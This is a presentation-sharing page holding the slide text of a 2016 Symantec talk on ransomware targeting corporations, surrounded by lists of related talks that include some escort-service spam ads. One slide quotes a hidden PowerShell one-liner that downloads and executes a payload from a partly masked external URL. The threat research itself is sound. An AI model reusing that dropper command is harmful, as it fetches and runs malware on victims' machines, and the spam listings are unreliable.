3 Tips to Stay Safe Online in 2017Bret Piatt
 
Keynote fx try harder 2 be yourself
Keynote fx try harder 2 be yourselfKeynote fx try harder 2 be yourself
Keynote fx try harder 2 be yourselfDefconRussia
 
Surfing with Sharks KS ED TECH 2012
Surfing with Sharks KS ED TECH 2012Surfing with Sharks KS ED TECH 2012
Surfing with Sharks KS ED TECH 2012inf8nity
 
Ransomware Response Guide IBM INCIDENT RESPONSE SERVICES
Ransomware Response Guide IBM INCIDENT RESPONSE SERVICESRansomware Response Guide IBM INCIDENT RESPONSE SERVICES
Ransomware Response Guide IBM INCIDENT RESPONSE SERVICESKatherine Duffy
 

Ähnlich wie Corporations - the new victims of targeted ransomware (20)

Ransomware Attack.pptx
Ransomware Attack.pptxRansomware Attack.pptx
Ransomware Attack.pptx
 
Hacking and its Defence
Hacking and its DefenceHacking and its Defence
Hacking and its Defence
 
Ransomware by lokesh
Ransomware by lokeshRansomware by lokesh
Ransomware by lokesh
 
Ransomware is Coming to a Desktop Near You
Ransomware is Coming to a Desktop Near YouRansomware is Coming to a Desktop Near You
Ransomware is Coming to a Desktop Near You
 
Hacking by Pratyush Gupta
Hacking by Pratyush GuptaHacking by Pratyush Gupta
Hacking by Pratyush Gupta
 
Computer Security
Computer SecurityComputer Security
Computer Security
 
How to stay protected against ransomware
How to stay protected against ransomwareHow to stay protected against ransomware
How to stay protected against ransomware
 
Ransomware History and Monitoring Tips
Ransomware History and Monitoring TipsRansomware History and Monitoring Tips
Ransomware History and Monitoring Tips
 
Ransomware all locked up book
Ransomware all locked up bookRansomware all locked up book
Ransomware all locked up book
 
LIFT OFF 2017: Ransomware and IR Overview
LIFT OFF 2017: Ransomware and IR OverviewLIFT OFF 2017: Ransomware and IR Overview
LIFT OFF 2017: Ransomware and IR Overview
 
What’s the Difference Between Identity Fraud and Identity Theft?
What’s the Difference Between Identity Fraud and Identity Theft?What’s the Difference Between Identity Fraud and Identity Theft?
What’s the Difference Between Identity Fraud and Identity Theft?
 
What’s the Difference Between Identity Fraud and Identity Theft.docx.pptx
What’s the Difference Between Identity Fraud and Identity Theft.docx.pptxWhat’s the Difference Between Identity Fraud and Identity Theft.docx.pptx
What’s the Difference Between Identity Fraud and Identity Theft.docx.pptx
 
Ransomware hostage rescue manual
Ransomware hostage rescue manualRansomware hostage rescue manual
Ransomware hostage rescue manual
 
Ransomware - what is it, how to protect against it
Ransomware - what is it, how to protect against itRansomware - what is it, how to protect against it
Ransomware - what is it, how to protect against it
 
3 Tips to Stay Safe Online in 2017
3 Tips to Stay Safe Online in 20173 Tips to Stay Safe Online in 2017
3 Tips to Stay Safe Online in 2017
 
Keynote fx try harder 2 be yourself
Keynote fx try harder 2 be yourselfKeynote fx try harder 2 be yourself
Keynote fx try harder 2 be yourself
 
Ransomware : A cyber crime without solution ? by Prashant Mali
Ransomware : A cyber crime without solution ? by Prashant MaliRansomware : A cyber crime without solution ? by Prashant Mali
Ransomware : A cyber crime without solution ? by Prashant Mali
 
Surfing with Sharks KS ED TECH 2012
Surfing with Sharks KS ED TECH 2012Surfing with Sharks KS ED TECH 2012
Surfing with Sharks KS ED TECH 2012
 
Ransomware
RansomwareRansomware
Ransomware
 
Ransomware Response Guide IBM INCIDENT RESPONSE SERVICES
Ransomware Response Guide IBM INCIDENT RESPONSE SERVICESRansomware Response Guide IBM INCIDENT RESPONSE SERVICES
Ransomware Response Guide IBM INCIDENT RESPONSE SERVICES
 

Mehr von Cyber Security Alliance

Why huntung IoC fails at protecting against targeted attacks
Why huntung IoC fails at protecting against targeted attacksWhy huntung IoC fails at protecting against targeted attacks
Why huntung IoC fails at protecting against targeted attacksCyber Security Alliance
 
Introducing Man in the Contacts attack to trick encrypted messaging apps
Introducing Man in the Contacts attack to trick encrypted messaging appsIntroducing Man in the Contacts attack to trick encrypted messaging apps
Introducing Man in the Contacts attack to trick encrypted messaging appsCyber Security Alliance
 
Reverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande ModemReverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande ModemCyber Security Alliance
 
Easy public-private-keys-strong-authentication-using-u2 f
Easy public-private-keys-strong-authentication-using-u2 fEasy public-private-keys-strong-authentication-using-u2 f
Easy public-private-keys-strong-authentication-using-u2 fCyber Security Alliance
 
Create a-strong-two-factors-authentication-device-for-less-than-chf-100
Create a-strong-two-factors-authentication-device-for-less-than-chf-100Create a-strong-two-factors-authentication-device-for-less-than-chf-100
Create a-strong-two-factors-authentication-device-for-less-than-chf-100Cyber Security Alliance
 
Offline bruteforce attack on wi fi protected setup
Offline bruteforce attack on wi fi protected setupOffline bruteforce attack on wi fi protected setup
Offline bruteforce attack on wi fi protected setupCyber Security Alliance
 
App secforum2014 andrivet-cplusplus11-metaprogramming_applied_to_software_obf...
App secforum2014 andrivet-cplusplus11-metaprogramming_applied_to_software_obf...App secforum2014 andrivet-cplusplus11-metaprogramming_applied_to_software_obf...
App secforum2014 andrivet-cplusplus11-metaprogramming_applied_to_software_obf...Cyber Security Alliance
 
Killing any security product … using a Mimikatz undocumented feature
Killing any security product … using a Mimikatz undocumented featureKilling any security product … using a Mimikatz undocumented feature
Killing any security product … using a Mimikatz undocumented featureCyber Security Alliance
 
Asfws 2014 slides why .net needs ma-cs and other serial(-ization) tales_v2.0
Asfws 2014 slides why .net needs ma-cs and other serial(-ization) tales_v2.0Asfws 2014 slides why .net needs ma-cs and other serial(-ization) tales_v2.0
Asfws 2014 slides why .net needs ma-cs and other serial(-ization) tales_v2.0Cyber Security Alliance
 

Mehr von Cyber Security Alliance (20)

Bug Bounty @ Swisscom
Bug Bounty @ SwisscomBug Bounty @ Swisscom
Bug Bounty @ Swisscom
 
Why huntung IoC fails at protecting against targeted attacks
Why huntung IoC fails at protecting against targeted attacksWhy huntung IoC fails at protecting against targeted attacks
Why huntung IoC fails at protecting against targeted attacks
 
Blockchain for Beginners
Blockchain for Beginners Blockchain for Beginners
Blockchain for Beginners
 
Le pentest pour les nuls #cybsec16
Le pentest pour les nuls #cybsec16Le pentest pour les nuls #cybsec16
Le pentest pour les nuls #cybsec16
 
Introducing Man in the Contacts attack to trick encrypted messaging apps
Introducing Man in the Contacts attack to trick encrypted messaging appsIntroducing Man in the Contacts attack to trick encrypted messaging apps
Introducing Man in the Contacts attack to trick encrypted messaging apps
 
Rump : iOS patch diffing
Rump : iOS patch diffingRump : iOS patch diffing
Rump : iOS patch diffing
 
An easy way into your sap systems v3.0
An easy way into your sap systems v3.0An easy way into your sap systems v3.0
An easy way into your sap systems v3.0
 
Reverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande ModemReverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande Modem
 
Easy public-private-keys-strong-authentication-using-u2 f
Easy public-private-keys-strong-authentication-using-u2 fEasy public-private-keys-strong-authentication-using-u2 f
Easy public-private-keys-strong-authentication-using-u2 f
 
Create a-strong-two-factors-authentication-device-for-less-than-chf-100
Create a-strong-two-factors-authentication-device-for-less-than-chf-100Create a-strong-two-factors-authentication-device-for-less-than-chf-100
Create a-strong-two-factors-authentication-device-for-less-than-chf-100
 
Offline bruteforce attack on wi fi protected setup
Offline bruteforce attack on wi fi protected setupOffline bruteforce attack on wi fi protected setup
Offline bruteforce attack on wi fi protected setup
 
App secforum2014 andrivet-cplusplus11-metaprogramming_applied_to_software_obf...
App secforum2014 andrivet-cplusplus11-metaprogramming_applied_to_software_obf...App secforum2014 andrivet-cplusplus11-metaprogramming_applied_to_software_obf...
App secforum2014 andrivet-cplusplus11-metaprogramming_applied_to_software_obf...
 
Killing any security product … using a Mimikatz undocumented feature
Killing any security product … using a Mimikatz undocumented featureKilling any security product … using a Mimikatz undocumented feature
Killing any security product … using a Mimikatz undocumented feature
 
Rump attaque usb_caralinda_fabrice
Rump attaque usb_caralinda_fabriceRump attaque usb_caralinda_fabrice
Rump attaque usb_caralinda_fabrice
 
Operation emmental appsec
Operation emmental appsecOperation emmental appsec
Operation emmental appsec
 
Hacking the swisscom modem
Hacking the swisscom modemHacking the swisscom modem
Hacking the swisscom modem
 
Colt sp sec2014_appsec-nf-vfinal
Colt sp sec2014_appsec-nf-vfinalColt sp sec2014_appsec-nf-vfinal
Colt sp sec2014_appsec-nf-vfinal
 
Asfws2014 tproxy
Asfws2014 tproxyAsfws2014 tproxy
Asfws2014 tproxy
 
Asfws 2014 slides why .net needs ma-cs and other serial(-ization) tales_v2.0
Asfws 2014 slides why .net needs ma-cs and other serial(-ization) tales_v2.0Asfws 2014 slides why .net needs ma-cs and other serial(-ization) tales_v2.0
Asfws 2014 slides why .net needs ma-cs and other serial(-ization) tales_v2.0
 
Appsec rump reverse-i_os_machook
Appsec rump reverse-i_os_machookAppsec rump reverse-i_os_machook
Appsec rump reverse-i_os_machook
 

Kürzlich hochgeladen

5 Signs You Need a Fashion PLM Software.pdf
5 Signs You Need a Fashion PLM Software.pdf5 Signs You Need a Fashion PLM Software.pdf
5 Signs You Need a Fashion PLM Software.pdfWave PLM
 
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdfLearn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdfkalichargn70th171
 
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...ICS
 
Unlocking the Future of AI Agents with Large Language Models
Unlocking the Future of AI Agents with Large Language ModelsUnlocking the Future of AI Agents with Large Language Models
Unlocking the Future of AI Agents with Large Language Modelsaagamshah0812
 
TECUNIQUE: Success Stories: IT Service provider
TECUNIQUE: Success Stories: IT Service providerTECUNIQUE: Success Stories: IT Service provider
TECUNIQUE: Success Stories: IT Service providermohitmore19
 
Diamond Application Development Crafting Solutions with Precision
Diamond Application Development Crafting Solutions with PrecisionDiamond Application Development Crafting Solutions with Precision
Diamond Application Development Crafting Solutions with PrecisionSolGuruz
 
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...MyIntelliSource, Inc.
 
Right Money Management App For Your Financial Goals
Right Money Management App For Your Financial GoalsRight Money Management App For Your Financial Goals
Right Money Management App For Your Financial GoalsJhone kinadey
 
How To Use Server-Side Rendering with Nuxt.js
How To Use Server-Side Rendering with Nuxt.jsHow To Use Server-Side Rendering with Nuxt.js
How To Use Server-Side Rendering with Nuxt.jsAndolasoft Inc
 
Software Quality Assurance Interview Questions
Software Quality Assurance Interview QuestionsSoftware Quality Assurance Interview Questions
Software Quality Assurance Interview QuestionsArshad QA
 
CALL ON ➥8923113531 🔝Call Girls Kakori Lucknow best sexual service Online ☂️
CALL ON ➥8923113531 🔝Call Girls Kakori Lucknow best sexual service Online ☂️CALL ON ➥8923113531 🔝Call Girls Kakori Lucknow best sexual service Online ☂️
CALL ON ➥8923113531 🔝Call Girls Kakori Lucknow best sexual service Online ☂️anilsa9823
 
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...kellynguyen01
 
Optimizing AI for immediate response in Smart CCTV
Optimizing AI for immediate response in Smart CCTVOptimizing AI for immediate response in Smart CCTV
Optimizing AI for immediate response in Smart CCTVshikhaohhpro
 
Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...
Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...
Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...OnePlan Solutions
 
HR Software Buyers Guide in 2024 - HRSoftware.com
HR Software Buyers Guide in 2024 - HRSoftware.comHR Software Buyers Guide in 2024 - HRSoftware.com
HR Software Buyers Guide in 2024 - HRSoftware.comFatema Valibhai
 
A Secure and Reliable Document Management System is Essential.docx
A Secure and Reliable Document Management System is Essential.docxA Secure and Reliable Document Management System is Essential.docx
A Secure and Reliable Document Management System is Essential.docxComplianceQuest1
 
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...Steffen Staab
 
How To Troubleshoot Collaboration Apps for the Modern Connected Worker
How To Troubleshoot Collaboration Apps for the Modern Connected WorkerHow To Troubleshoot Collaboration Apps for the Modern Connected Worker
How To Troubleshoot Collaboration Apps for the Modern Connected WorkerThousandEyes
 

Kürzlich hochgeladen (20)

5 Signs You Need a Fashion PLM Software.pdf
5 Signs You Need a Fashion PLM Software.pdf5 Signs You Need a Fashion PLM Software.pdf
5 Signs You Need a Fashion PLM Software.pdf
 
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdfLearn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
 
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
 
Unlocking the Future of AI Agents with Large Language Models
Unlocking the Future of AI Agents with Large Language ModelsUnlocking the Future of AI Agents with Large Language Models
Unlocking the Future of AI Agents with Large Language Models
 
TECUNIQUE: Success Stories: IT Service provider
TECUNIQUE: Success Stories: IT Service providerTECUNIQUE: Success Stories: IT Service provider
TECUNIQUE: Success Stories: IT Service provider
 
Diamond Application Development Crafting Solutions with Precision
Diamond Application Development Crafting Solutions with PrecisionDiamond Application Development Crafting Solutions with Precision
Diamond Application Development Crafting Solutions with Precision
 
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
 
Right Money Management App For Your Financial Goals
Right Money Management App For Your Financial GoalsRight Money Management App For Your Financial Goals
Right Money Management App For Your Financial Goals
 
How To Use Server-Side Rendering with Nuxt.js
How To Use Server-Side Rendering with Nuxt.jsHow To Use Server-Side Rendering with Nuxt.js
How To Use Server-Side Rendering with Nuxt.js
 
Software Quality Assurance Interview Questions
Software Quality Assurance Interview QuestionsSoftware Quality Assurance Interview Questions
Software Quality Assurance Interview Questions
 
CALL ON ➥8923113531 🔝Call Girls Kakori Lucknow best sexual service Online ☂️
CALL ON ➥8923113531 🔝Call Girls Kakori Lucknow best sexual service Online ☂️CALL ON ➥8923113531 🔝Call Girls Kakori Lucknow best sexual service Online ☂️
CALL ON ➥8923113531 🔝Call Girls Kakori Lucknow best sexual service Online ☂️
 
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
 
Optimizing AI for immediate response in Smart CCTV
Optimizing AI for immediate response in Smart CCTVOptimizing AI for immediate response in Smart CCTV
Optimizing AI for immediate response in Smart CCTV
 
Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...
Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...
Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...
 
HR Software Buyers Guide in 2024 - HRSoftware.com
HR Software Buyers Guide in 2024 - HRSoftware.comHR Software Buyers Guide in 2024 - HRSoftware.com
HR Software Buyers Guide in 2024 - HRSoftware.com
 
A Secure and Reliable Document Management System is Essential.docx
A Secure and Reliable Document Management System is Essential.docxA Secure and Reliable Document Management System is Essential.docx
A Secure and Reliable Document Management System is Essential.docx
 
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
 
Microsoft AI Transformation Partner Playbook.pdf
Microsoft AI Transformation Partner Playbook.pdfMicrosoft AI Transformation Partner Playbook.pdf
Microsoft AI Transformation Partner Playbook.pdf
 
How To Troubleshoot Collaboration Apps for the Modern Connected Worker
How To Troubleshoot Collaboration Apps for the Modern Connected WorkerHow To Troubleshoot Collaboration Apps for the Modern Connected Worker
How To Troubleshoot Collaboration Apps for the Modern Connected Worker
 
Vip Call Girls Noida ➡️ Delhi ➡️ 9999965857 No Advance 24HRS Live
Vip Call Girls Noida ➡️ Delhi ➡️ 9999965857 No Advance 24HRS LiveVip Call Girls Noida ➡️ Delhi ➡️ 9999965857 No Advance 24HRS Live
Vip Call Girls Noida ➡️ Delhi ➡️ 9999965857 No Advance 24HRS Live
 

Corporations - the new victims of targeted ransomware

  • 1. Copyright 2016, Symantec Corporation Candid Wüest Symantec Security Response 1 Corporations – the new victims of targeted ransomware
  • 4. Copyright2016,SymantecCorporation WHY ? 4What if there were no hypothetical questions?
  • 5. Copyright2016,SymantecCorporation Because it is profitable! $ 209 Million damage Jan-March 2016 (according to FBI) 5A clear conscience is usually the sign of a bad memory.
  • 6. Copyright2016,SymantecCorporation • Email – Link to malicious file on Dropbox & Co. – Office document with malicious macro – Script file (JavaScript, VBS, PowerShell, …) • Sometimes in container (Zip, RAR, HTA, WSF, LNK,…) with password • Infected Websites – Web exploit toolkits (1.4 Mio attacks blocked / day) • Rig, Magnitude etc. – Malvertisement • With any coding language out there – Incl. Python, Powershell, JS, Google's Go Language,… The common infection vector 6Hard work never killed anyone, but why take the chance?
  • 7. Copyright2016,SymantecCorporation Enabling Macros with Social Engineering 7I don’t suffer from insanity; I enjoy every minute of it.
  • 8. Copyright2016,SymantecCorporation Infection droppers trends Use of scripting languages to evade detection/sandboxes – Obfuscated: JavaScript, PHP, PowerShell, Python, VBS,… – JS conditional compilation trick /*@cc_on @*/ – Macro to check for VM (environment checks) • “InkPicture_Painted” instead Document_Open() or AutoOpen() trigger • Application.RecentFiles.Count <3 – Script to check IPs before payload download (e.g. MaxMind service) • Payload execution – Execute dll with rundll32.exe and export string – Seed parameter from JS (to decrypt payload) – Encrypted archive or installer package 8 powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -command $f=[System.IO.Path]::GetTempFileName();(New-Object System.Net.WebClient).DownloadFile('http://********lied socialinnovation.org/plugins/office365', $f); (New-Object -com WScript.Shell).Exec($f) 2 + 2 = 5 for extremely large values of 2!
  • 10. Copyright2016,SymantecCorporation Ransomware Cryptolocker expansion 10 100 new families identified in 2015 77 in 2014, 88 in 2016* CAPS LOCK – Preventing Login Since 1980.
  • 12. Copyright2016,SymantecCorporation Top 10 infections on 29.10.2016 12… error joke not found
  • 13. Copyright2016,SymantecCorporation Show me the money 13 $372.53 $294.14 $679.65 $0 $100 $200 $300 $400 $500 $600 $700 $800 2014 2015 2016 • Ransom is usually requested in Bitcoins • The average ransom has more than doubled last year Artificial intelligence is no match for natural stupidity.
  • 14. Copyright2016,SymantecCorporation How to make even more money? • Payment features – Tesla chat support and free sample decryption – CryptXXX steals Bitcoin wallet data – Cerber adds machines to botnet to carry out DDoS attacks. – Use of Amazon/iTunes/phone gift cards instead of Bitcoins • New threats added to ransom note – Chimera threatens to post personal data online – Jigsaw deletes random files over time – Stampado re-encrypts already encrypted files from other cryptolockers – Virolock Spreads to shares and cloud storage as fileinfector 14I didn't say it was your fault, I said I was blaming you.
  • 15. Copyright2016,SymantecCorporation Where are the victims? 15 3%Canada 8% 5% United Kingdom Belgium Netherlands India3% Italy 3% 4% Germany 2% Australia 4% 8% Japan United States 31% Is “NO” the correct answer to this question? Currently big wave in Brazil
  • 16. Copyright2016,SymantecCorporation 16 Businesses as a target 43% of ransomware infections occur inside organizations Employees like to open private emails at work Smith & Wesson: The original point and click interface.
  • 17. Copyright2016,SymantecCorporation Advanced attack techniques 17 Recent ransomware attacks use tactics and techniques typically seen in “APT”-style attacks Infiltration Exploit server-side vulnerabilities to gain access to the network. Reconnaissance Attackers gather information that may help in later stages of the attack, such as back-up policy. Information gathered may also be used in the ransom note. Lateral movement Attackers use publicly available tools to plot out and traverse the network and gain access to strategic locations like ICS or DB systems Stealth Once the attack has been successfully carried out the attackers attempt to hide their tracks by removing any tools used. What happens if you get scared half to death, twice?
  • 18. Copyright2016,SymantecCorporation Example: SamSam case • Entry point was unpatched web server; exploited JBoss vulnerability with JexBoss • Used psExec and retrieved passwords to traverse the network • Deleted backups to make recovery difficult • Deployed SamSam strain of ransomware • Removed copies of malware and associated tools to hide tracks • Ransom was 1.5 Bitcoin (~US$989) for each computer 18Everyone is entitled to his own opinion, but not to his own facts.
  • 19. Copyright2016,SymantecCorporation Further TTPs seen • Attack remote access tools – Bruteforcing passwords for RDP, Teamviewer, VNC, FTP, … • Exploit webserver and jump further from there – SQLinjection to modify DB content • Spear phishing • Some groups try POS or BEC scams first, and then move to ransomware • Some «ATP» groups use ransomware instead of wiper to hide intention 19I can explain it to you, but I can not undestand it for you Not very sophisticated But often successful
  • 20. Copyright2016,SymantecCorporation What are they after? • Documents • Databases (encrypt data or change password) • Fileshares/cloud (even if not mapped: passwords from mimikatz or enumtools) • Websites – E.g. added «mcrypt_encrypt()» to DB calls • The backups (to delete them, infect them or encrypt them) • In some rare cases industrial controller, more likely classical blackmailing 20If I agreed with you we’d both be wrong
  • 21. Copyright2016,SymantecCorporation Victim organization profile Services 37.8% Manufacturing 17.2% Public Administration 10.2% Finance, Insurance, & Real Estate 9.8% Wholesale 8.9% Transportation, Comms, & Utilities 6.6% Retail 4.3% Construction 3.9% Mining 1.0% Agri, Forestry, & Fishing 0.5% What about Healthcare? Healthcare seeing more targeted attacks and therefore not reflected in the numbers 21All generalizations are false.
  • 22. Copyright2016,SymantecCorporation Crypto is difficult (for most people) 22Press SPACEBAR once to quit or twice to save changes..
  • 23. Copyright2016,SymantecCorporation Protection strategies • Backup your data (out of reach!) • Keep your system and software up-to-date • Doublecheck shared folders – Does it auto sync to cloud? – How is your fileserver protected? • Follow best practices (2FA, security software,…) – Disable scripts, powershell etc. if you dont use it • Be prepared - play the exercise drill • Some have experimented with «honeyfiles» and «folder-sinkholes» 23Always remember you're unique, just like everyone else.
  • 24. Copyright2016,SymantecCorporation Don’t forget your phones 24 • Android Ransomware is out there • IoT device ransomware not seen at large in the wild, but possible
  • 25. Copyright2016,SymantecCorporation  100 new families identified in 2015, most not sophisticated  Scripts are popular to evade first-step detection  Employees in organizations represent 43% of infections  There are ransomware groups going after organizations  Most attacks are not targeted, but still devastating  It is profitable for the attackers, so it won’t go away overnight Summary – keep your data safe! 25Better to understand a little than to misunderstand a lot.
  • 26. Thank you! Copyright © 2016 Symantec Corporation. All rights reserved. Symantec and the Symantec Logo are trademarks or registered trademarks of Symantec Corporation or its affiliates in the U.S. and other countries. Other names may be trademarks of their respective owners. This document is provided for informational purposes only and is not intended as advertising. All warranties relating to the information in this document, either express or implied, are disclaimed to the maximum extent allowed by law. The information in this document is subject to change without notice. Threat Researcher - Symantec Security Response Candid Wüest
  • 27. Copyright2016,SymantecCorporation 27I like birthdays, but I think too many can kill you.